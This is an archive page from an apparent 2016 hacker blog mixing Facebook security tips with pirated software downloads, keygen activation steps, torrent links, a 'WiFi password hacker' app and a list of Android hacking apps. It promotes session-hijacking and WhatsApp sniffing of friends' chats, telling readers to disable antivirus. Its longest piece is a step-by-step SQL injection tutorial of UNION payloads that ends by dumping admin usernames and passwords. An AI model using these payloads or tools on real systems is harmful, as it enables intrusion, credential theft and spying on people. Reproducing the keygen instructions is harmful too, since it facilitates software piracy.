Monday 29 February 2016

Prevent Your Facebook Account To Being Hacked 2016

Heyy Guyzzz..
I'm WaZiristani HaXor, Sorry to all that I can't post here regularly, But These time I'm with some projects..
Prevent Your Facebook Account To Being Hacked 2016
Prevent Your Facebook Account To Being Hacked 2016
Today I'm Telling You That How to protect Your Facebook account from being hacked?

Hacking of Facebook Account 2016
#1. It's very easy to hack a Facebook account If you are ignorant about the page URL. Many phishers around the Web create a page which will exactly look like the Facebook login page. If you log in using that page, Your account will be in the hands of some Tom, Dick or Harry. So always check the URL of the page before logging in.

#2. Visiting Links which are shared by your
Friends. This would be also a cause of Hacking of the Facebook account. So, Double check when you are visiting a link shared by your friends. If you think its a good clean link, then proceed.

Prevent Your Facebook Account To Being Hacked 2016




#3. Do you think, Your Facebook account is being accessed by anyone? Get Notified when your Facebook account is logged in from a different place.


How to do this?

1. Log in to your Facebook account, Clicks on
Account and navigate to Account Settings.

2. Under Account Security, Check Send me an email, If a new computer or mobile device logs into this account. You can also Check Send me a text message If you have added a mobile device.

Additional Tip: Also enable HTTPS secure
browsing.

#4. Avoid using Spam Applications. Don’t try to use an application which you don’t know or seen some of your friends using. To View/Edit applications which you are using, Go to Applications Settings page.

Additional Tip: Remove Applications which you are not using now.

#5. Always use a complex and very strong
Password. A combination of Alphabets, Numbers and Special Characters is an unbeatable or unguessable password. Avoid using your Name, Girl Friends name, Your Mobile number etc., in your password as these are easily guessable.

#6. Don’t accept requests from the people you don’t know. Avoid adding people you don’t know to your friends list. If he/she is a Mutual Friend then you can add.

#7. Regularly scan your Computer with some Anti-Spyware or Anti-Malware tools. Some of the recommended tools are Panda Active Scan, Trend Micro Housecall Thus these are the 7 Basic as well as Best possible ways for preventing and stopping the Hacking of Facebook Account.

Share This Information.. :) 

How To Use WhatsApp In Java Mobile Phones Latest Trick 2016

Hey, Guyzz..

I'm WaZiristani HaXor, Today in Sharing An Awesome Trick With You By Which You Can Use Whatsapp In your Java Mobile phone. 

Yeah, If you are not android /windows/ iPhone /blackberry User nd wanna Use Whatsapp on your java mobile phone then this post is for you. Actually, most of my friends are unable to use WhatsApp bcoz they don't have any smartphone. Most of the peoples still waiting to get their own smartphone so that they can use WhatsApp on their phone.. :) :)

But there is an restriction that your mobile screen size must be 240x320px or 320x240px.. :):)

How To Use WhatsApp In Java Mobile Phones Latest Trick 2016
How To Use WhatsApp In Java Mobile Phones Latest Trick 2016


How To Use WhatsApp In Java Mobile Phones Latest Trick 2016


What you have to do to use WhatsApp on your java phone..???

You just have to download both whatsapp.jar & WhatsApp.jar  files From below links on your sd card.


Remember that both files should be copied to the Same folder.

Now open Whatsapp.jad nd enjoys using WhatsApp on your java mobile.. :) :)

Note: sometimes this files doesn't work of you download it via mobile. Therefore, I suggest you download both files via PC then copy files to your sd card.. :) :) 

Asia Cup 2016 Live Streaming HD & Full SChedule


Asia Cup 2016 Full Schedule is given below;
Live Streaming on Star Sports Channel


Note: 
If you've clicked on given link and ADF.LY or Go.TalitMahmood.Tk website opens, WAIT 5 FOR SECONDS then click SKIP AD to proceed.

Post Author :
Talit Mahmood
If you have any problem regarding this website or this article, Comment below. I'm here to resolve your issue.
Thanks :)
Advertisement :

Friday 26 February 2016

How to Get UNLIMITED Instagram Followers for FREE and Without following others!

In this tutorial i am gonna show you how to get unlimited Instagram followers FOR FREE and WITHOUT following others! it's 100% free and safe.
How to Get UNLIMITED Instagram Followers for FREE and Without following others?

Just follow these steps:
1. First go to Hublaagram .

2. Enter your instagram username and a random password.
3. Insert security code to continue.
4. Click on INSTAFOLLOW.
5. Wait 5 seconds then click Skip Ads.
6. Finally click ''SUBMIT FOLLOWERS" button.
7. Enjoy :)

If you aren’t understanding the Step By Step guide then please watch this video tutorial.

Thursday 25 February 2016

DOWNLOAD WIFI Password HACKER FOR FREE .APK FILE FOR ANDROID 2016

You are downloading WiFi Hacker for free .apk file in your Android device and in order to download you have provided two direct download links i.e., Google Play & Dropbox and a Google Play store link below on which you can simply click and download the .apk file of WiFi Hacker for free Android app. WiFi hacker for free is an Android WiFi hacker as well as WiFi password breaker app that helps Android users to easily get WiFi access wherever they go.
DOWNLOAD WIFI Password HACKER FOR FREE .APK FILE FOR ANDROID 2016
DOWNLOAD WIFI Password HACKER FOR FREE.APK FILE FOR ANDROID 2016

Note: Please beware that WaZiristani HaXor only shares the original and free apk installer for WiFi Hacker for the free .apk file without any modifications or any alterations within the .apk file package for illegal activities.
All applications are free and for home or personal user only. Kindly, contact us for any download infringement or your copyright.

Download WiFi Hacker for free .apk File (File Size: 2.9 MB)











Maxthon Cloud Browser 4.9.1.1000 Multilingual and Nitro 1.0.0.3000




Full-Featured Browser without installation.

Download Portable Maxthon 4.x.x.x Online (0.7 MB) 25/02/16

In first screen enter: 4.9.1.1000 or 4.9.2.600-beta



Can use Java Runtime Environment Portable





Speed optimized Browser without installation.

Download Portable MxNitro Multiversion Online (0.6 MB) 24/01/15

In first screen enter: 1.0.0.3000_492955e8120038c4026da698bc76fe8b



Extract and run MaxthonPortable or MxNitroPortable.

Settings of installed Maxthon should be preserved.

Wednesday 24 February 2016

BitTorrent 7.9.5.41866 Multilingual




BitTorrent client without installation.

Download Portable BitTorrent Online (0.2 MB) 14/02/16

In first screen enter language build: 30544 (skip if you need only english or have yet this build)

Download Portable BitTorrentPro 7.9.5.41373 (3.4 MB)


Extract and run BitTorrentPortable.

Settings of installed BitTorrent should be preserved.

PowerArchiver 2016 16.00.69 Multilingual




Archiving utility without installation.

Download Portable PowerArchiver 2016 Multilingual (24 MB) 25/03/16


Extract and run PowerArchiverPortable.

Settings of installed PowerArchiver should be preserved.


Tuesday 23 February 2016

Azureus 5.7.1.0 32-64 bit Multilingual & Vuze Leap 1.3.0.1




Bittorrent Client without installation.

Download Portable Azureus 32-64 bit (9.0 MB)

Download Portable Vuze Leap Online (0.6 MB) 26/02/15



Azureus needs Java Runtime Environment Portable or Installed.



Extract and run AzureusPortable or VuzeLeapPortable.exe.

Settings of installed Azureus should be preserved.

Friday 19 February 2016

Download Texas HoldEm Poker Free 2016

Get Texas HoldEm Poker Free 2016.Texas HoldEm is most favorite game you can play free online. in Play Texas Hold’em Poker Live ,the most authentic poker game to play with friends and millions of others around the world with unlimited Free entertainment, top-tier graphics.


Download Texas HoldEm Poker Free 2016
Download Texas HoldEm Poker Free 2016





UltraEdit 23.00 32-64 bit Multilingual




Powerful text editor without installation.

Download Portable UltraEdit 32-64 bit Multilingual Online (0.3 MB) 19/02/16

Latest don't run on Windows XP: Portable UltraEdit 14.20.1.1000 English (9.5 MB)


Multilingual Online (English, French, German, Italian, Japanese, Korean, SimpChinese, TradChinese, Spanish) download setup and extract files from it.


Extract and run UltraEditPortable.

When new computer detected or after main update:

Enter license key: enter any License ID and Password in Activation Windows then click on Activate.

Click Offline Activation. Copy User Code 1 & 2 into CORE KeyGen (Program: UltraEdit v21.30). Then Generate.

Copy Authorization Code 1 & 2 into Offline Activation fields and any License ID and Password.

Then Activate, Exit Keygen and close the text.

Activations are kept for several computers.


Settings created in Data\UltraEdit

You can add wordfiles (syntax highlighting) in Data\WordFiles

If you drag'n drop a file on (or open with) UltraEditPortable: it will be opened in UltraEdit.

For above use, write AllowMultipleInstances=true in UltraEditPortable.ini

Settings of installed UltraEdit should be preserved.


Thursday 18 February 2016

EasyRecovery Enterprise 11.5.0.2 32-64 bit Multilingual




Recover deleted files and restore files that are lost or damaged without installation.

Download Portable EasyRecovery Online (0.3 MB)12/09/15


Extract and run EasyRecoveryPortable.

Settings of installed EasyRecovery should be preserved.

Virtual DJ 8.1 build 2857.1116 & 7.4.1 build 482 Multilingual




DJ mixing software for professional and semi-pro DJs without installation.

Download Portable VirtualDJ 8 PRO Infinity Online (1.1 MB) 13/09/15

In first screen enter: 8.1.2857

When new computer detected, enter email in R2R KeyGen, click on GENERATE then exit (X).

Registrarion kept for several computers.

Virtual DJ 8 don't run on a clean (just installed) Windows XP or 7.


Download Portable VirtualDJ 7 Pro (28.0 MB).

Download Portable VirtualDJ 7 Home (28.0 MB).

Extract and run VirtualDJPortable.

Settings of installed VirtualDJ should be preserved.


Wednesday 17 February 2016

Light Image Resizer 4.7.7.0 Multilingual




Manage your digital photos without installation.

Download Portable ImageResizer Online (0.4 MB) 03/12/15



Extract and run ImageResizerPortable.

You can add switches (App\ImageResizer\switches.txt) with AdditionalParameters in ImageResizerPortable.ini.

Settings of installed ImageResizer should be preserved.

How can we Make Gradient in Adobe Photoshope 7 0

In this simple and easy tutorial we know How to Make Gradient in Adobe Photoshop 7 0.


How can we Make Gradient in Adobe Photoshope 7 0




Sunday 14 February 2016

Sanam Re (2016) Full Hindi Movie Watch Online + HD Torrent


Sanam Re is a 2016 Indian Hindi-language romantic drama film directed by Divya Khosla Kumar and produced by Bhushan Kumar, Krishan Kumar and co-produced by Ajay Kapoor. The film features Pulkit SamratYami Gautam and Urvashi Rautela in the lead roles while Rishi Kapoor appear in crucial supporting roles.
Cast :
  • Pulkit Samrat as Aakash
  • Yami Gautam as Shruti
  • Urvashi Rautela as Akanksha
  • Rishi Kapoor as Daddu
  • Bharti Singh as Baby Ji

Watch Online

Movie can be removed due to Copyright claim.
But Torrent Download will be permanent.





Note: 
If you've clicked on given link and ADF.LY or Go.TalitMahmood.Tk website opens, WAIT 5 FOR SECONDS then click SKIP AD to proceed.

Post Author :
Talit Mahmood
If you have any problem regarding this website or this article, Comment below. I'm here to resolve your issue.
Thanks :)
Advertisement :

Saturday 13 February 2016

SpeedCommander 16.10.8200 32-64 bit En-De




A fast file manager with many special features without installation.

Download Portable SpeedCommander 16 Online (0.2 MB) 06/10/15

Download Portable SpeedCommander 15 Online (0.2 MB) 26/04/15


Extract and run SpeedCommanderPortable.

Settings of installed SpeedCommander should be preserved.

Friday 12 February 2016

Download BackTrack 5 R3 ISO Free (64 & 32 Bit)

If You are here to Download BackTrack 5 R3 ISO Free (64 & 32 Bit) So, You are Landed at Right Webpage because here we Discuss all BackTrack 5 R3 and Below we also Share the Direct Download Link to BackTrack 5 R3.
BackTrack 5 R3 is one of the Most Powerful Linux Distribution used for Penetration and Find Loopholes in Websites, Software and Application. Basically, it is Based on GNOME Linux Distribution and Include many of Top used Security Tools Like MetaSploit, Wireshark, AirCrack, Nmap and other Digital Forensic Tools. BackTrack 5 R3 is Developed by Offensive Securities and Soon They are Stop BackTrack Linux Series. The Last Edition of this Operating System is BackTrack 5 R3 and Further They Starting a new Project that is also a Newest Version of This Operating System Known as Kali Linux. It is the Successor of Backtrack 5 R3 and Include all the Tools that you have in BackTrack 5 R3. BackTrack is also Found as Best Operating System Used by Hackers.
Download BackTrack 5 R3 ISO Free (64 & 32 Bit)
Download BackTrack 5 R3 ISO Free (64 & 32 Bit)

There are Millions of Security Researchers (White Hat) who use BackTrack 5 R3 for Digital Forensics, Testing Systems, Networks and Other Penetration work. But On the Other Hand, It is also the Favourite Operating System Picked by Hackers because of their Tools and Features. Hackers and Crackers use this Operating System, not For Testing Instead to Breaking Systems, Cracking Passwords, Hacking Accounts and other Notorious Work. BackTrack have all the Deadly Tools and Programs that you need to Break the Digital Systems. The Last Edition of BackTrack 5 R3 is released on August 13, 2012. After that, They Start Project Kali.
  • Features of BackTrack 5 R3:
  • Available in Different Flavours.
  • Include all Hacking Tools.
  • Preinstalled Digital Forensics.
  • Simple and Easy Interface.
  • Open Source for All People World Wide.
  • Preinstalled Drivers.

Download BackTrack 5 R3 with Below Links:

From Editor’s Desk:

Guys, BackTrack 5 R3 is the Most Used Operating Systems for Hacking and Cracking because it include all the Hacking Tools that a Hacker Need to Crack into a Systems. It is also useful for White Hat Hackers who easily find Bugs, Flaws and Other Defects in Software Application. They use This Operating System Before Start their Software, Sites and other Program. I Seen many People Around me Who face Issue to Download BackTrack 5 R3 64 & 32 Bit So that’s Whu=y here am Share a Full working Direct Downloading Links.

Thursday 11 February 2016

FACEBOOK TIPS AND TRICKS 2016

Facebook is Biggest and Top Social Network Site in The World.Million of the active user on Facebook.we use Facebook on Daily Base.Different of Type Things we see on Facebook.Facebook Update Daily I Main in Seconds.In 1 Sec People Share Thousand of Text, Photo, and Videos and other Things on Facebook. Everyone knows Facebook, but not everyone knows Facebook very well. You could spend your days on the world’s biggest social network liking and sharing, or you could learn a few tricks that will bring you closer to being a power user.
FACEBOOK TIPS AND TRICKS 2016
FACEBOOK TIPS AND TRICKS 2016

Today I gathered a list of interesting top best facebook tips and tricks.
Create & Manage Friends’ Lists
Organize your friends in lists and control who can view what’s on your profile. Go to Facebook Lists Page and see the default lists prepared for you. Click on “Create List” to make your own.
Schedule Posts
Want to make sure your posts go live even when you’re offline? Use Facebook’s scheduling tool and set a publishing time for your posts. Click on the clock icon in the status line field and take it from there.
Set your Facebook profile picture a video
Open your Facebook Profile and Go your profile
Change your profile picture
Record the video
Preview video and select thumbnail
Your video is now live
Setting up a profile video is very easy.your Profile picture and then choose either Take a New Profile Video or Upload Video or Photo.you can record a new video.
How To Making Your Profile Photo Un-clickable
Go to your Albums – > Profile Pictures
Select your current profile picture.
Adjust privacy setting to “Only Me
Schedule Facebook Messages
if you want to Post Some Status on Facebook you Can Share on Schedule.You Choose time When your Want to Share.And Post.
Edit Your Published Comments
Facebook lets users edit their comments quite easily. All you need to do is roll over the comment, click on the pencil icon and edit away!
Discover Messages that Facebook Hides
Not many people know that Facebook messages get split into two folders: Messages and Other. If you haven’t looked into the Other folder before, you probably missed some messages you didn’t want to miss.
Create a Photo Collage
Click on Friends tab. Proceed to More tab. From “Choose an option” dropdown, choose any of the dashes “—”. Your Facebook friends college is right on your computer screen.
Display Selected Pictures Only on your Facebook Profile Page
A little-known feature in Facebook that lets you decide who shows up in that Friends box. Click that “edit” pencil in your Friends box and type the names of your best friends in the box that says “Always show these friends
Download Facebook Photo Albums
Facebook allow their user to Download Photo and Videos Albums From Facebook.You Can Easily Download Photo Albums From Facebook.
Download FB Album mod Google Chrome Extension
Stop Others From Tagging You on Facebook
On the homepage of your profile, click the settings button.
From the drop-down list that appears, click Settings.
General Accounts Settings page that opens up, select Timeline and Tagging
On the Timeline and a Tagging page that opens up, click the Edit link representing the Review posts friend tag you in before they appear on your timeline heading.
Click the Disabled button.
Send and Receive Money On Facebook
Open a chat with the friend you want to send money to
Click $ and enter the amount you want to send
Click Next to add your debit card and then click Pay.
Choose Who Can See You on Facebook’s Online Chat
if you don’t want to Share You Chat with Your Friends. you can Make your Chat Off For your friends.Add Custom friend Who can See your chat.Click on Advance Chat Setting.click the ‘Settings’ icon at the bottom of the chat section, go to “Advanced Settings” and make your choice.
How To Turn Off Facebook Sounds
if you do not want sounds of text and Notification you Turn off Facebook sounds.
Click Facebook and select Settings
Click Notifications in the left column
Click View next to On Facebook
Off and Save
Remove Facebook Advertisements
Log into Facebook on a desktop computer and go to your Ads Manager.
Click Account Settings in the top menu. You may be asked to re-enter your Facebook password.
Scroll down to the end of the page.
Click the Deactivate Ad Account link at the bottom of the page.
Click Deactivate Ad Account in the bottom
You can Use Add Blocker if you Use Google Chrome
Get Facebook Updates on Email
Now Choose Settings.
Click Notifications in the left column and then click Email.
Click Text Message and then click Edit to turn text notifications on or off.
Secure Your Facebook Account
Make your Facebook account Secure.Try to use Strong Password.
Settings -> Security -> Login Approvals -> On
Log Out of Facebook Remotely
Now Click on Facebook homepage and select Settings
Click Security from the left column
Click Where You’re Logged In
Find the session you want to end and click End Activity
This was our article. I am sure you guys have found it helpful and worth reading. If you have any queries or confusion left related, post your comments in comment section. I will get back to your queries as soon as possible. And don’t forget to share this article with your other friends and circle too. You may never know that your share may be proven helpful for many of the users out there. So keep sharing and keep learning

DOWNLOAD BEST ANDROID HACKING APPS 2016

Linux is considered the best operating system for Ethical Hacking and Penetration Testing. As android is a Linux based operating system so there are various hacking apps for android. So we are sharing a list of android hacking applications which will turn your android device into a hacking machine. Android is not just a machine, It is fully featured computer machine. When you rooted your android phone, you gain complete access your android phone. You can run some ethical hacking android apps on the phone that make your android phone into a fully-featured hacking machine.

DOWNLOAD BEST ANDROID HACKING APPS 2016
DOWNLOAD BEST ANDROID HACKING APPS 2016

With the rise of technology and advancements in the mobile field, hacking these days have become very common which was once thought to be done only by those who have an expert knowledge of computers. Even everyday things such as a smart device are hacked nowadays. Android Mobiles can run penetration testing and security test from hacking android apps.

Download Best Android Hacking Apps 2016

Traffic sniffer works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on TCP dump.
Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap app for your phone! Once your scan finishes you can e-mail the results. This application is not official apps but it looks good.

AndroRAT 

AndroRAT is a remote administration tool for android devices. The remote administration tool is basically a client-server application which is used to control a system without having physical access to the system.

SpoofApp

Spoof App allow us to spoof (Place) calls with any caller ID number. To spoof calls, we need Spoof Cards which are sold separately. Some other features include voice changer using which we can change our voice. You can also record the whole conversation. If you are installing the app for the first time then you will receive a free 5 minute Spoof Card.
Droid Pentest helps you to find all android apps for penetration testing and hacking so you can make complete penetration test platform. It is one of the Best Android Hacking app 2015.

DroidSheep

DroidSheep [Root] is an Android app for Security analysis in wireless networks and capturing facebook, twitter, LinkedIn and other accounts. DroidSheep was developed as a tool for testing the security of your accounts and is based on my Bachelor thesis with title ‘Session Hijacking on Android Devices’.

Droidsheep Guard

DroidSheep demonstrates the simplicity of session hijacking within a WiFi-Network — just a single click and your facebook, eBay, twitter, LinkedIn account are taken over by an adversary  and you´re defenseless.

Droidsniff

DroidSniff is an Android app for Security analysis in wireless networks and capturing facebook, twitter, LinkedIn and other accounts. It is one the best hacking apps but was only developed for security purposes.

WhatsApp Sniffer

WhatsApp Sniffer is a great android hacking app, which works in tandem with the WhatsApp application. Using this app, you can hack private WhatsApp chats, pictures, audios and videos of your friends who are using your WiFi Hotspot. You can manipulate pictures, videos, account info at your pleasure. It is detected by antivirus so disable your antivirus before using this app.

Eviloperator

This app automatically connects two people in a phone call making them feel that they called each other. Eviloperator’s biggest merit would probably have to be that you can record and save the conversation.

WiFi Killer

This app is used to block a person who is using your WiFi network. You can disable internet connection of any device that is using your network.

Androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

APKInspector

APKinspector is a powerful GUI tool for analysts to analyze the Android applications. The goal of this project is to aid analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.

dSploit

dSploit is an advanced toolkit to perform network security assessments on mobile phones. It is a complete toolkit so you can perform various attacks like password sniffing, real-time traffic manipulation, etc

Penetrate Pro

Penetrate Pro is used to calculate WPA/WEP keys for some routers which mean it is used for wifi decoding. Some antivirus may flag the app as the virus because it uses some security permissions.
Turns your android phone into a Wi-Fi analyzer!! Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router.
This was our guide. If you have any issues or queries left related to this issues then send your queries in the comment box. I shall get back to you as soon as possible.

Wednesday 10 February 2016

Learn How To Hack Websites With Different Techniques

SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial, i will be showing you the steps to carry out the attack on a MySQL Database.



Learn How To Hack Websites With Different Techniques
Learn How To Hack Websites With Different Techniques


Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically, the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering an ' after the number in the URL. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2


Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the URL, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put, union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.


Step 4


We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these don't work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5


In this step, our aim is to list all the table names in the database. To do this we enter the following command after the URL.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the URL would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user, email, and password.

Step 7


Finally, we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the URL would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you don't have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Tuesday 9 February 2016

Ashampoo Burning Studio 16.0.6.23 Multilingual




Burning software without installation.

Download Portable Burning Studio 16 Online (1.5 MB) 09/02/16



Extract and run BurningStudio16Portable.

Settings of installed Burning Studio should be preserved.


Sunday 7 February 2016

Grand Theft Auto 5 GTA V(5) PC Game Free Download Full Version (Torrent)

Grand Theft Auto V is an open world, action-adventure video game developed by Rockstar North and published by Rockstar Games. It was released on 17 September 2013 for the PlayStation 3 and Xbox 360. An enhanced version of the game was released on 18 November 2014 for the PlayStation 4 and Xbox One, and is scheduled to be released on 14 April 2015 for Microsoft Windows. The game is the first main entry in the Grand Theft Auto series since 2008's Grand Theft Auto IV. Set within the fictional state of San Andreas (based on Southern California), the single-player story follows three criminals and their efforts to commit heists while under pressure from a government agency. The open world design lets players freely roam San Andreas, which includes open countryside and the fictional city of Los Santos (based on Los Angeles).
The game is played from either a third-person or first-person view and its world is navigated on foot or by vehicle. Players control the three lead protagonists throughout the single-player mode, switching between them both during and outside of missions. The story is centred on the heist sequences, and many of the missions involve shooting and driving gameplay. Players who commit crimes may incite a response from law enforcement agencies, measured by a "wanted" system that governs the aggression of their response. Grand Theft Auto Online, the online multiplayer mode, lets up to 30 players explore the open world and engage in cooperative or competitive game matches.



Minimum Requirements:
CPU:Intel Core 2 Quad CPU Q6600 @ 2.40GHz (4 CPUs) / AMD Phenom 9850 Quad-Core Processor (4 CPUs) @ 2.5GHz
CPU Speed:Info
RAM:4 GB
OS:Windows 8.1 64 Bit, Windows 8 64 Bit, Windows 7 64 Bit Service Pack 1, Windows Vista 64 Bit Service Pack 2* (*NVIDIA video card recommended if running Vista OS)
Video Card:NVIDIA GeForce 9800 GT 1GB / AMD Radeon HD 4870 1GB (DX 10, 10.1, 11)
Sound Card:Yes
Free Disk Space:65 GB
Recommended Requirements:
CPU:Intel Core i5 3470 @ 3.2GHZ (4 CPUs) / AMD X8 FX-8350 @ 4GHZ (8 CPUs)
CPU Speed:Info
RAM:8 GB
OS:Windows 8.1 64 Bit, Windows 8 64 Bit, Windows 7 64 Bit Service Pack 1
Video Card:NVIDIA GeForce GTX 660 2GB / AMD Radeon HD 7870 2GB
Sound Card:Yes
Free Disk Space:65 GB


Reference:



If you have Any Problem Regarding this Game. Feel free to Comment Below.....